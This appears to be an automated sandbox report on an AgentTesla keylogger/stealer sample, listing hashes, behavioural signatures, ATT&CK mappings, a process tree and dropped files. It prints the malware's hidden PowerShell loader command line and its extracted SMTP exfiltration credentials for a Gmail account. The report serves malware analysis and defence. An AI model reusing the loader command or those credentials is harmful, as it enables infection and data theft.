agenttesla | 914593c3a4ec4f8b63537ea8bc08079cdace1b6ddcff95d1ede0b49eb11da709

Analysis

max time kernel
145s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17/10/2024, 01:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

914593c3a4ec4f8b63537ea8bc08079cdace1b6ddcff95d1ede0b49eb11da709.exe
Size

781KB
MD5

b18d405d583c06c41cce7f63c78a802a
SHA1

28b19058141d53c08948af6b89fd6409b3924ad5
SHA256

914593c3a4ec4f8b63537ea8bc08079cdace1b6ddcff95d1ede0b49eb11da709
SHA512

58f65689fb2a58da9a359a5d38b7640857001b546b798c48f7c189b35b87bc6e159cbebf9a54c3e3ffca0eb6362f6be7ae05a65108ef5299e6553e201f24f10d
SSDEEP

12288:EtmU+gdBSt4tnO5N3KSekX08rVU8t5xWonVp4g0Cla+ve7bAvANa24jV:Et1+GO5Z3XTr5xWoV90sjvzE1

Score

10^/10

agenttesla discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
smtp.gmail.com
Port:
587
Username:
[email protected]
Password:
nhpe dfhf irbv bqxe

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.gmail.com
Port:
587
Username:
[email protected]
Password:
nhpe dfhf irbv bqxe
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4912	powershell.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
26	5044	msiexec.exe
29	5044	msiexec.exe
32	5044	msiexec.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	api.ipify.org
28	api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
5044	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4912	powershell.exe
5044	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	914593c3a4ec4f8b63537ea8bc08079cdace1b6ddcff95d1ede0b49eb11da709.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4912	powershell.exe
4912	powershell.exe
4912	powershell.exe
4912	powershell.exe
4912	powershell.exe
4912	powershell.exe
4912	powershell.exe
4912	powershell.exe
4912	powershell.exe
5044	msiexec.exe
5044	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4912	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	4912	powershell.exe
Token: SeIncreaseQuotaPrivilege	4912	powershell.exe
Token: SeSecurityPrivilege	4912	powershell.exe
Token: SeTakeOwnershipPrivilege	4912	powershell.exe
Token: SeLoadDriverPrivilege	4912	powershell.exe
Token: SeSystemProfilePrivilege	4912	powershell.exe
Token: SeSystemtimePrivilege	4912	powershell.exe
Token: SeProfSingleProcessPrivilege	4912	powershell.exe
Token: SeIncBasePriorityPrivilege	4912	powershell.exe
Token: SeCreatePagefilePrivilege	4912	powershell.exe
Token: SeBackupPrivilege	4912	powershell.exe
Token: SeRestorePrivilege	4912	powershell.exe
Token: SeShutdownPrivilege	4912	powershell.exe
Token: SeDebugPrivilege	4912	powershell.exe
Token: SeSystemEnvironmentPrivilege	4912	powershell.exe
Token: SeRemoteShutdownPrivilege	4912	powershell.exe
Token: SeUndockPrivilege	4912	powershell.exe
Token: SeManageVolumePrivilege	4912	powershell.exe
Token: 33	4912	powershell.exe
Token: 34	4912	powershell.exe
Token: 35	4912	powershell.exe
Token: 36	4912	powershell.exe
Token: SeDebugPrivilege	5044	msiexec.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 2812 wrote to memory of 4912	2812	914593c3a4ec4f8b63537ea8bc08079cdace1b6ddcff95d1ede0b49eb11da709.exe	85
PID 2812 wrote to memory of 4912	2812	914593c3a4ec4f8b63537ea8bc08079cdace1b6ddcff95d1ede0b49eb11da709.exe	85
PID 2812 wrote to memory of 4912	2812	914593c3a4ec4f8b63537ea8bc08079cdace1b6ddcff95d1ede0b49eb11da709.exe	85
PID 4912 wrote to memory of 5044	4912	powershell.exe	97
PID 4912 wrote to memory of 5044	4912	powershell.exe	97
PID 4912 wrote to memory of 5044	4912	powershell.exe	97
PID 4912 wrote to memory of 5044	4912	powershell.exe	97

C:\Users\Admin\AppData\Local\Temp\914593c3a4ec4f8b63537ea8bc08079cdace1b6ddcff95d1ede0b49eb11da709.exe
"C:\Users\Admin\AppData\Local\Temp\914593c3a4ec4f8b63537ea8bc08079cdace1b6ddcff95d1ede0b49eb11da709.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2812
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Newsreader=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\gurlis\billeter\pli\Kvoteordning.Con11';$insection=$Newsreader.SubString(11513,3);.$insection($Newsreader) "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\SysWOW64\msiexec.exe"
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ns55oyj0.ogb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\gurlis\billeter\pli\Kvoteordning.Con11

Filesize
69KB

MD5
44e87939c2b9b122a06ddf4f4ca21107

SHA1
b2a88ecfd4647b2b3947e9ac02615039f0b14797

SHA256
5fd699d89de57b4a2f9f73adcc80b86c804816e922e7b799e62365d969bccdb9

SHA512
254506aadd3676c551fb25f1d51a3433f2fbbab852d5956c39e0d9ec7bfb5cecbe63b4ab409de3db1f119f0c837685dd3355a337faf39f0cc06ebecd2848828a

Download Submit
C:\Users\Admin\AppData\Roaming\gurlis\billeter\pli\Levi.Spl

Filesize
305KB

MD5
c92d934f679645fd467fd987f4dd0f82

SHA1
850378d6439e7f7a5790c3c8d30e9eafd3bac462

SHA256
2ba03ecc6fe4832d2e3af3c19de4abb8fb14d8c78b334cfb93d9805db967ab59

SHA512
5249dc52c009cd4a793202e34031d0cb0ff0d9c24165346b4aa083f8ba50f2ebcc7918078ec8d4b1f627af9df7aae5354cb9c0c93f87ae96613124b46541ae32

Download Submit
memory/4912-47-0x00000000076C0000-0x0000000007763000-memory.dmp

Filesize
652KB

Download
memory/4912-35-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-12-0x0000000005250000-0x0000000005272000-memory.dmp

Filesize
136KB

Download
memory/4912-13-0x0000000005B60000-0x0000000005BC6000-memory.dmp

Filesize
408KB

Download
memory/4912-14-0x0000000005BD0000-0x0000000005C36000-memory.dmp

Filesize
408KB

Download
memory/4912-10-0x00000000053C0000-0x00000000059E8000-memory.dmp

Filesize
6.2MB

Download
memory/4912-24-0x0000000005C40000-0x0000000005F94000-memory.dmp

Filesize
3.3MB

Download
memory/4912-25-0x0000000006220000-0x000000000623E000-memory.dmp

Filesize
120KB

Download
memory/4912-26-0x00000000062B0000-0x00000000062FC000-memory.dmp

Filesize
304KB

Download
memory/4912-27-0x00000000071D0000-0x0000000007266000-memory.dmp

Filesize
600KB

Download
memory/4912-28-0x0000000006730000-0x000000000674A000-memory.dmp

Filesize
104KB

Download
memory/4912-29-0x0000000006780000-0x00000000067A2000-memory.dmp

Filesize
136KB

Download
memory/4912-30-0x0000000007A60000-0x0000000008004000-memory.dmp

Filesize
5.6MB

Download
memory/4912-9-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-32-0x0000000008690000-0x0000000008D0A000-memory.dmp

Filesize
6.5MB

Download
memory/4912-52-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-34-0x00000000704E0000-0x000000007052C000-memory.dmp

Filesize
304KB

Download
memory/4912-33-0x0000000007650000-0x0000000007682000-memory.dmp

Filesize
200KB

Download
memory/4912-36-0x0000000070C60000-0x0000000070FB4000-memory.dmp

Filesize
3.3MB

Download
memory/4912-46-0x0000000007690000-0x00000000076AE000-memory.dmp

Filesize
120KB

Download
memory/4912-48-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-7-0x000000007405E000-0x000000007405F000-memory.dmp

Filesize
4KB

Download
memory/4912-11-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-49-0x00000000077C0000-0x00000000077CA000-memory.dmp

Filesize
40KB

Download
memory/4912-51-0x0000000007970000-0x0000000007994000-memory.dmp

Filesize
144KB

Download
memory/4912-50-0x0000000007940000-0x000000000796A000-memory.dmp

Filesize
168KB

Download
memory/4912-53-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-55-0x000000007405E000-0x000000007405F000-memory.dmp

Filesize
4KB

Download
memory/4912-56-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-57-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-8-0x0000000002C40000-0x0000000002C76000-memory.dmp

Filesize
216KB

Download
memory/4912-60-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-59-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-62-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-61-0x0000000008D10000-0x000000000A0C6000-memory.dmp

Filesize
19.7MB

Download
memory/4912-63-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-64-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/4912-65-0x0000000074050000-0x0000000074800000-memory.dmp

Filesize
7.7MB

Download
memory/5044-66-0x0000000002110000-0x00000000034C6000-memory.dmp

Filesize
19.7MB

Download
memory/5044-67-0x0000000000EB0000-0x0000000002104000-memory.dmp

Filesize
18.3MB

Download
memory/5044-68-0x0000000000EB0000-0x0000000000EF2000-memory.dmp

Filesize
264KB

Download
memory/5044-69-0x00000000215F0000-0x0000000021640000-memory.dmp

Filesize
320KB

Download
memory/5044-70-0x00000000216E0000-0x000000002177C000-memory.dmp

Filesize
624KB

Download
memory/5044-72-0x0000000002110000-0x00000000034C6000-memory.dmp

Filesize
19.7MB

Download
memory/5044-73-0x0000000021860000-0x00000000218F2000-memory.dmp

Filesize
584KB

Download
memory/5044-74-0x00000000217F0000-0x00000000217FA000-memory.dmp

Filesize
40KB

Download